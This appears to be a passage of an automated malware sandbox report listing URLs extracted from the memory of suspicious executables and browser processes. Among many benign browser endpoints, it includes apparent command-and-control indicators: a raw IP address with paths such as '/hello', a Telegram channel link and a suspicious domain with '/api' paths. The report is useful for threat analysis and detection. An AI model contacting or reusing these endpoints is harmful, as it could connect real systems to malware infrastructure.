Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.entrust.net/rpa03
Source: chrome.exe, 00000022.00000002.2536078024.000078C403360000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google-analytics.com;reprt-uri
Source: chrome.exe, 00000022.00000002.2526175676.000078C402C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: qFqSpAp.exe, 0000000E.00000003.2105428791.000000000420D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: qFqSpAp.exe, 0000000E.00000003.2105428791.000000000420D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 7aencsM.exe, 00000018.00000002.2781694240.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2781694240.0000000000E3C000.00000004.00000020.00020000.00000000.sdmp, 7aencsM.exe, 0000003B.00000002.2775680612.000000000041E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.210.149/
Source: 7aencsM.exe, 00000018.00000002.2781694240.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.210.149//
Source: 7aencsM.exe, 00000018.00000002.2781694240.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.210.149/3
Source: 7aencsM.exe, 00000018.00000002.2781694240.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.210.149/9
Source: 7aencsM.exe, 00000018.00000002.2781694240.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.210.149/?
Source: 7aencsM.exe, 00000018.00000002.2781694240.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.210.149/C
Source: 7aencsM.exe, 00000018.00000002.2781694240.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.210.149/W
Source: 7aencsM.exe, 00000018.00000002.2781694240.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.210.149/c
Source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp, 7aencsM.exe, 0000003B.00000002.2775680612.000000000041E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.210.149/hello
Source: 7aencsM.exe, 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.210.149/hellohttps://t.me/g02f04ot0yikamMozilla/5.0
Source: 7aencsM.exe, 00000018.00000002.2781694240.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2781694240.0000000000E3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.210.149/l
Source: qFqSpAp.exe, 0000000E.00000003.2069781454.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069870204.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069969508.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2820097256.0000000003E28000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2323606864.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527698275.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318117825.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000022.00000002.2518279107.000078C402278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000022.00000002.2521881117.000078C4026A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2521638103.000078C402628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2518049276.000078C40221C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/C
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000022.00000003.2333800848.000078C402494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000022.00000003.2333800848.000078C402494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000022.00000003.2333800848.000078C402494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 00000022.00000002.2518518184.000078C4022B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000022.00000002.2518518184.000078C4022B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000022.00000002.2518518184.000078C4022B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000022.00000002.2518279107.000078C402278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: powershell.exe, 00000020.00000002.2357011977.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2595388076.0000000004D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830S
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162L
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/73205
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320R
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369H
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369V
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714&
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/78470
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318244696.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2317262534.000078C40258C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000022.00000002.2537312291.000078C403908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350301639.000078C403518000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2348852833.000078C403944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000022.00000002.2518189588.000078C402260000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523892028.000078C40294C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes
Source: 7aencsM.exe, 00000018.00000002.2802152564.0000000003991000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.png
Source: qFqSpAp.exe, qFqSpAp.exe, 0000000E.00000003.2133837428.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2133682441.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2134074610.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2138371141.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2168044854.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2122030581.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2168475565.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2097202028.0000000003F33000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2118461498.0000000003F33000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2171828060.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2122645101.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blastikcn.com/
Source: qFqSpAp.exe, 0000000E.00000003.2168044854.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2168475565.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2171828060.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blastikcn.com/H
Source: qFqSpAp.exe, 0000000E.00000003.2103867404.0000000003F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blastikcn.com/api
Source: qFqSpAp.exe, 0000000E.00000003.2133682441.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2134048331.0000000003F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blastikcn.com/apis
Source: qFqSpAp.exe, 0000000E.00000003.2118461498.0000000003F54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blastikcn.com/apitO
Source: qFqSpAp.exe, 0000000E.00000003.2133682441.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2134048331.0000000003F5C000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2118461498.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2118756830.0000000003F5C000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2105057417.0000000003F37000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2118633914.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2097202028.0000000003F33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blastikcn.com/d
Source: qFqSpAp.exe, 0000000E.00000003.2168044854.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2168475565.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2171828060.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blastikcn.com/k
Source: qFqSpAp.exe, 0000000E.00000003.2168044854.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2168475565.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2171828060.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blastikcn.com/o
Source: qFqSpAp.exe, 0000000E.00000003.2133682441.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2134048331.0000000003F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blastikcn.com/pi
Source: qFqSpAp.exe, 0000000E.00000003.2168044854.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2168475565.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2171828060.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blastikcn.com/w
Source: qFqSpAp.exe, 0000000E.00000003.2097202028.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2118461498.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2118756830.0000000003F5C000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2118633914.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2105749195.0000000003F5C000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2103867404.0000000003F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blastikcn.com/xtClx2v
Source: qFqSpAp.exe, qFqSpAp.exe, 0000000E.00000003.2118841793.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2121908083.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2118461498.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2118633914.0000000003F54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blastikcn.com:443/api
Source: qFqSpAp.exe, 0000000E.00000003.2118407844.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: jROrnzx.exe, 00000012.00000002.2329211901.000000000115C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: chrome.exe, 00000022.00000002.2524108763.000078C402988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533414027.000078C4031DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522577631.000078C40271C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000022.00000003.2323606864.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527698275.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318117825.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: qFqSpAp.exe, 0000000E.00000003.2069781454.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069870204.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069969508.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2820097256.0000000003E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: qFqSpAp.exe, 0000000E.00000003.2069781454.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069870204.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069969508.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2820097256.0000000003E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000022.00000002.2527223720.000078C402DBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000022.00000002.2527223720.000078C402DBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000022.00000002.2527223720.000078C402DBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: qFqSpAp.exe, 0000000E.00000003.2069781454.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069870204.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069969508.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2820097256.0000000003E28000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2521638103.000078C402628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000022.00000002.2518837569.000078C4022FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.cob
Source: chrome.exe, 00000022.00000003.2334096133.000078C4034BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523168058.000078C40281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2322578104.000078C403014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2319279161.000078C403014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2519783341.000078C40237C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000002.2560591886.0000693C02220000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000022.00000002.2523168058.000078C40281C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000022.00000002.2526175676.000078C402C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523679614.000078C4028F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2536144569.000078C403370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2529190410.000078C402FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525409166.000078C402BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
